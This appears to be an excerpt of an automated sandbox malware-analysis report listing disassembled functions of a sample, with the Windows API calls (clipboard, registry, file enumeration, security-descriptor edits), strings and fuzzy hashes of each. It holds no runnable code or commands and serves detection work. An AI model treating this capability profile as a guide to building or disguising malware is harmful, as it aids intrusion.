GetClipboardData.USER32 ref: 00007FF7A5230B61
GlobalLock.KERNEL32 ref: 00007FF7A5230B76
GlobalUnlock.KERNEL32 ref: 00007FF7A5230BB5
CloseClipboard.USER32 ref: 00007FF7A5230CFC

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
Instruction ID: 7c5ca94141cd9a42b8d4de19b54796a4d4b4b5c2425f608247caf71c6c905367
Opcode Fuzzy Hash: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
Instruction Fuzzy Hash: 447161A2B0B64282EA15BB11E8542BCA3A1FF96F54FC24035DA4E437F9DE3CE505C760

Function 00007FF7A524C6D4 Relevance: 28.9, APIs: 19, Instructions: 396windowCOMMON

Download Yara Rule

APIs

SetWindowTextW.USER32 ref: 00007FF7A524C876
SendMessageW.USER32 ref: 00007FF7A524C88E
SendMessageW.USER32 ref: 00007FF7A524C8B6
SendMessageW.USER32 ref: 00007FF7A524C8CE
CharNextW.USER32 ref: 00007FF7A524C903
SendMessageW.USER32 ref: 00007FF7A524C91B
SendMessageW.USER32 ref: 00007FF7A524C950
SendMessageW.USER32 ref: 00007FF7A524C971
GetMenuItemInfoW.USER32 ref: 00007FF7A524C9E1
SetMenuItemInfoW.USER32 ref: 00007FF7A524CA06
DrawMenuBar.USER32 ref: 00007FF7A524CA13
SendMessageW.USER32 ref: 00007FF7A524CA53
InvalidateRect.USER32 ref: 00007FF7A524CA78
SetWindowTextW.USER32 ref: 00007FF7A524CB01
SendMessageW.USER32 ref: 00007FF7A524CB71
SendMessageW.USER32 ref: 00007FF7A524CBE3
SendMessageW.USER32 ref: 00007FF7A524CC3D
SendMessageW.USER32 ref: 00007FF7A524CCC3
SendMessageW.USER32 ref: 00007FF7A524CD2E

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
String ID:
API String ID: 1015379403-0
Opcode ID: 811f6ddedc4938916125b3772b32f534d797e58df8d8128b9f335a51bc1c3411
Instruction ID: b58b04639172baf5af4c326d1af744e9402da7e4456f8f17b060787aa7a5f036
Opcode Fuzzy Hash: 811f6ddedc4938916125b3772b32f534d797e58df8d8128b9f335a51bc1c3411
Instruction Fuzzy Hash: 0602C5A2A0A68285E720AF24DC442B9A771FB86F94F864131DA5D17BFDCF3CE5418720

Function 00007FF7A523206C Relevance: 27.1, APIs: 18, Instructions: 125COMMON

Download Yara Rule

APIs

LoadCursorW.USER32 ref: 00007FF7A5232094
LoadCursorW.USER32 ref: 00007FF7A52320A5
LoadCursorW.USER32 ref: 00007FF7A52320B6
LoadCursorW.USER32 ref: 00007FF7A52320C7
LoadCursorW.USER32 ref: 00007FF7A52320D8
LoadCursorW.USER32 ref: 00007FF7A52320E9
LoadCursorW.USER32 ref: 00007FF7A52320FA
LoadCursorW.USER32 ref: 00007FF7A523210B
LoadCursorW.USER32 ref: 00007FF7A523211C
LoadCursorW.USER32 ref: 00007FF7A523212D
LoadCursorW.USER32 ref: 00007FF7A523213E
LoadCursorW.USER32 ref: 00007FF7A523214F
LoadCursorW.USER32 ref: 00007FF7A5232160
LoadCursorW.USER32 ref: 00007FF7A5232171
LoadCursorW.USER32 ref: 00007FF7A5232182
LoadCursorW.USER32 ref: 00007FF7A5232193
GetCursorInfo.USER32 ref: 00007FF7A52321A8
GetLastError.KERNEL32 ref: 00007FF7A52321E9

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
Instruction ID: 6d06cfbde16f335e6e8b46c5d1e544b554c609ffc800e876e41bfcfb024ceb32
Opcode Fuzzy Hash: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
Instruction Fuzzy Hash: 57519F72F0EB028AEB58AF64F81817D73A1EB4AB54F414439DA0E837E8DE7DE4158314

Function 00007FF7A5240AEC Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 388registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32 ref: 00007FF7A5240BF8
RegCreateKeyExW.ADVAPI32 ref: 00007FF7A5240C8C
RegSetValueExW.ADVAPI32 ref: 00007FF7A5240ED2
RegSetValueExW.ADVAPI32 ref: 00007FF7A5241047
RegCloseKey.ADVAPI32 ref: 00007FF7A524107A
RegCloseKey.ADVAPI32 ref: 00007FF7A5241089

Strings

REG_EXPAND_SZ, xrefs: 00007FF7A5240CFB
REG_BINARY, xrefs: 00007FF7A5240FE8
REG_DWORD, xrefs: 00007FF7A5240F1D
REG_SZ, xrefs: 00007FF7A5240D83
REG_MULTI_SZ, xrefs: 00007FF7A5240DF8
REG_QWORD, xrefs: 00007FF7A5240F90

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CloseValue$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 3314541760-966354055
Opcode ID: 8da99fa8f9cfa95644d42f55175067c4e32022aa9dc53b987727f765eeff7340
Instruction ID: 648d83b79f3a8268ec12f6c1580621ddd8736709626f834bbfd3384710a26e02
Opcode Fuzzy Hash: 8da99fa8f9cfa95644d42f55175067c4e32022aa9dc53b987727f765eeff7340
Instruction Fuzzy Hash: 98029366B09A4285EB11EF25D4902BDB7B0FB8AF84B864431DF0D477AADF38E545C360

Function 00007FF7A51A5F3C Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 223COMMON

Download Yara Rule

Strings

P, xrefs: 00007FF7A51A5F65

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
Instruction ID: ee353879c40080558406a778323c1dbfc54eebf68b5aa323fa9090a2880f8cbf
Opcode Fuzzy Hash: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
Instruction Fuzzy Hash: 7EA1D472A0A64186E725EF25E8046B9F760FB56F88F928135EB5E036A9CF3CE445C710

Function 00007FF7A51E2400 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 366timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7A51E243E

Part of subcall function 00007FF7A51E1BE0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51E1BF4

_get_daylight.LIBCMT ref: 00007FF7A51E242D

Part of subcall function 00007FF7A51E1C40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51E1C54

_get_daylight.LIBCMT ref: 00007FF7A51E2673
_get_daylight.LIBCMT ref: 00007FF7A51E2684
_get_daylight.LIBCMT ref: 00007FF7A51E2695
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A51E28F5), ref: 00007FF7A51E26BC
WideCharToMultiByte.KERNEL32 ref: 00007FF7A51E2752
WideCharToMultiByte.KERNEL32 ref: 00007FF7A51E279E

Strings

:, xrefs: 00007FF7A51E2534
?, xrefs: 00007FF7A51E2791
:, xrefs: 00007FF7A51E255E
-, xrefs: 00007FF7A51E2503

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
String ID: -$:$:$?
API String ID: 3440502458-92861585
Opcode ID: 59dcdab51f47b0a634fd4a16188f26c8f2a6bc9bd1c56be720e7c676ed12fe7f
Instruction ID: f3eb1b89ed01f05fc3e6b91405d72304abf6815b7f323e4e9aa62f71d9a4cac3
Opcode Fuzzy Hash: 59dcdab51f47b0a634fd4a16188f26c8f2a6bc9bd1c56be720e7c676ed12fe7f
Instruction Fuzzy Hash: FBE1F532A0A282C6F726AF31F8505B9A791BF86F84F854135FE5E426ADDF3CD4418720

Function 00007FF7A52272A8 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 284timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32 ref: 00007FF7A52272E8
FindClose.KERNEL32 ref: 00007FF7A522731A
FileTimeToLocalFileTime.KERNEL32 ref: 00007FF7A5227359
FileTimeToLocalFileTime.KERNEL32 ref: 00007FF7A5227381
FileTimeToSystemTime.KERNEL32 ref: 00007FF7A52273B3
FileTimeToSystemTime.KERNEL32 ref: 00007FF7A52273E3

Strings

%03d, xrefs: 00007FF7A52276CF
%4d%02d%02d%02d%02d%02d, xrefs: 00007FF7A522747E
%02d, xrefs: 00007FF7A5227519
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00007FF7A5227441
%4d, xrefs: 00007FF7A52274C3

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3232708057-3289030164
Opcode ID: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
Instruction ID: 53c1c2b4fca8f9e364e963d33f2aee26a3a888cab951b760a8a62ff7d68bbca8
Opcode Fuzzy Hash: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
Instruction Fuzzy Hash: AAD1A262B19A5291EB11EB65E8410FDA761FB82F94FC20131EA4D47ABDEF7CD108C760

Function 00007FF7A522A350 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32 ref: 00007FF7A522A390
GetFileAttributesW.KERNEL32 ref: 00007FF7A522A3CE
SetFileAttributesW.KERNEL32 ref: 00007FF7A522A3E5
FindNextFileW.KERNEL32 ref: 00007FF7A522A3FA
FindClose.KERNEL32 ref: 00007FF7A522A407
FindClose.KERNEL32 ref: 00007FF7A522A424
FindFirstFileW.KERNEL32 ref: 00007FF7A522A43D
SetCurrentDirectoryW.KERNEL32 ref: 00007FF7A522A489
SetCurrentDirectoryW.KERNEL32 ref: 00007FF7A522A4B0
FindNextFileW.KERNEL32 ref: 00007FF7A522A4BE
FindClose.KERNEL32 ref: 00007FF7A522A4CD

Strings

*.*, xrefs: 00007FF7A522A436

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
Instruction ID: b3c227e775489914070ed5c192c2a5d0aa8d19624c6e0f8a2aaec266b762dc54
Opcode Fuzzy Hash: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
Instruction Fuzzy Hash: 14418DA5A0A64255EA00AB15EC44279E3A1FB56FA4FC24131DD2E47AF8DF7CE44AC720

Function 00007FF7A521D87C Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 66COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM ref: 00007FF7A521D8F5
mciSendStringW.WINMM ref: 00007FF7A521D913
mciSendStringW.WINMM ref: 00007FF7A521D92B
mciSendStringW.WINMM ref: 00007FF7A521D949
mciSendStringW.WINMM ref: 00007FF7A521D967

Strings

alias PlayMe, xrefs: 00007FF7A521D8CF
play PlayMe wait, xrefs: 00007FF7A521D942
play PlayMe, xrefs: 00007FF7A521D960
open , xrefs: 00007FF7A521D894
status PlayMe mode, xrefs: 00007FF7A521D8EE
close PlayMe, xrefs: 00007FF7A521D907, 00007FF7A521D952

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
Instruction ID: 2c19de72e40f35f2aa0566159b1d51a162d091f01662c10572ce53062afd38cc
Opcode Fuzzy Hash: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
Instruction Fuzzy Hash: 32219562B0995292E721F724FC9067AA361FB96F48FC24031E64E439BCDE2CD505C760

Function 00007FF7A522A4F8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32 ref: 00007FF7A522A530
FindNextFileW.KERNEL32 ref: 00007FF7A522A588
FindClose.KERNEL32 ref: 00007FF7A522A595
FindClose.KERNEL32 ref: 00007FF7A522A5B3
FindFirstFileW.KERNEL32 ref: 00007FF7A522A5CC
SetCurrentDirectoryW.KERNEL32 ref: 00007FF7A522A611
SetCurrentDirectoryW.KERNEL32 ref: 00007FF7A522A638
FindNextFileW.KERNEL32 ref: 00007FF7A522A646
FindClose.KERNEL32 ref: 00007FF7A522A655

Part of subcall function 00007FF7A521C67C: CreateFileW.KERNEL32 ref: 00007FF7A521C6B1

Strings

*.*, xrefs: 00007FF7A522A5C5

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
Instruction ID: 88c0537a07574f4c05ac874708ffcc86fe136117a6f0962b32a386e9bb09b81b
Opcode Fuzzy Hash: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
Instruction Fuzzy Hash: 8D419095A0AA4254EA10AB11EC4467AE350BF42FA4FC24131DD6E07AFCEF7CE449C720

Function 00007FF7A5223E20 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32 ref: 00007FF7A5223E61
CreateDirectoryW.KERNEL32 ref: 00007FF7A5223EB2
CreateFileW.KERNEL32 ref: 00007FF7A5223EE4
RemoveDirectoryW.KERNEL32 ref: 00007FF7A5223EF6
DeviceIoControl.KERNEL32 ref: 00007FF7A5223FA5
CloseHandle.KERNEL32 ref: 00007FF7A5223FB2
CloseHandle.KERNEL32 ref: 00007FF7A5223FBD

Strings

:, xrefs: 00007FF7A5223E9F
\??\%s, xrefs: 00007FF7A5223E79
\, xrefs: 00007FF7A5223E97

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
String ID: :$\$\??\%s
API String ID: 3827137101-3457252023
Opcode ID: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
Instruction ID: 63deaf9881ab2db987163c24997204e1ff00b602186fe90c96111519b5e7c044
Opcode Fuzzy Hash: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
Instruction Fuzzy Hash: B941AF6661968385E730AF21E8006FDA3A0FF96B98F850135DA4D47AACDF7CD64AC710

Function 00007FF7A524055C Relevance: 16.9, APIs: 11, Instructions: 371registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A5241110: CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF7A523FD7B), ref: 00007FF7A5241143

RegConnectRegistryW.ADVAPI32 ref: 00007FF7A5240662
RegOpenKeyExW.ADVAPI32 ref: 00007FF7A52406CD
RegCloseKey.ADVAPI32 ref: 00007FF7A52406F4
RegQueryValueExW.ADVAPI32 ref: 00007FF7A5240746
RegQueryValueExW.ADVAPI32 ref: 00007FF7A52407FD
RegQueryValueExW.ADVAPI32 ref: 00007FF7A5240860
RegQueryValueExW.ADVAPI32 ref: 00007FF7A5240907
RegQueryValueExW.ADVAPI32 ref: 00007FF7A5240961
RegQueryValueExW.ADVAPI32 ref: 00007FF7A5240A12
RegCloseKey.ADVAPI32 ref: 00007FF7A5240A9E
RegCloseKey.ADVAPI32 ref: 00007FF7A5240AAD

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3218304859-0
Opcode ID: 56613195d31d9b8dc67beba3ae71979573c24aebd7d9093bc0b17d223b1a2dd4
Instruction ID: 7463da70b9dea132ec8e84a94afd07340f8d1ded6753c45de37d75bce43b0089
Opcode Fuzzy Hash: 56613195d31d9b8dc67beba3ae71979573c24aebd7d9093bc0b17d223b1a2dd4
Instruction Fuzzy Hash: 94F17372B06A4286EB10EF65D4902BCB370EB8AF94B824531DF4D47BA9DF38D141C754

Function 00007FF7A52283D4 Relevance: 16.8, APIs: 11, Instructions: 255comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00007FF7A5228452
SHGetSpecialFolderLocation.SHELL32 ref: 00007FF7A52284FC
SHGetDesktopFolder.SHELL32 ref: 00007FF7A5228516
CoCreateInstance.OLE32 ref: 00007FF7A522858F
SHCreateShellItem.SHELL32 ref: 00007FF7A5228629
CoTaskMemFree.OLE32 ref: 00007FF7A5228699
SHBrowseForFolderW.SHELL32 ref: 00007FF7A522872A
SHGetPathFromIDListW.SHELL32 ref: 00007FF7A522874B
CoTaskMemFree.OLE32 ref: 00007FF7A5228754
CoTaskMemFree.OLE32 ref: 00007FF7A5228799
CoUninitialize.OLE32 ref: 00007FF7A522879F

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 3f2bc404d53d5998161f0ee2b8df4f9bc3160e202cb50a098f9587f0d2c0f7e1
Instruction ID: 6423521690ae64bcea1b315283d70f07e1a77457769c774313ac62f02c1dbf5c
Opcode Fuzzy Hash: 3f2bc404d53d5998161f0ee2b8df4f9bc3160e202cb50a098f9587f0d2c0f7e1
Instruction Fuzzy Hash: 24C15966705B8585EB10EF26E8841ADB7A0FB8AF94F868036DE4E47779CF38D445C710

Function 00007FF7A520C5FC Relevance: 16.7, APIs: 11, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A520CD34: GetUserObjectSecurity.USER32 ref: 00007FF7A520CD65
Part of subcall function 00007FF7A520CD34: GetLastError.KERNEL32(?,?,?,?,00000000,00007FF7A520C65A), ref: 00007FF7A520CD71
Part of subcall function 00007FF7A520CD34: GetUserObjectSecurity.USER32 ref: 00007FF7A520CD9C

Part of subcall function 00007FF7A520CE28: InitializeSecurityDescriptor.ADVAPI32(?,?,00000000,00007FF7A520C66F), ref: 00007FF7A520CE4D

GetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF7A520C68B
GetAclInformation.ADVAPI32 ref: 00007FF7A520C6C5
GetLengthSid.ADVAPI32 ref: 00007FF7A520C6D6
GetAce.ADVAPI32 ref: 00007FF7A520C714
AddAce.ADVAPI32 ref: 00007FF7A520C73B
GetLengthSid.ADVAPI32 ref: 00007FF7A520C753
GetLengthSid.ADVAPI32 ref: 00007FF7A520C776
CopySid.ADVAPI32 ref: 00007FF7A520C785
AddAce.ADVAPI32 ref: 00007FF7A520C7CB
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF7A520C7EE
SetUserObjectSecurity.USER32 ref: 00007FF7A520C803

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

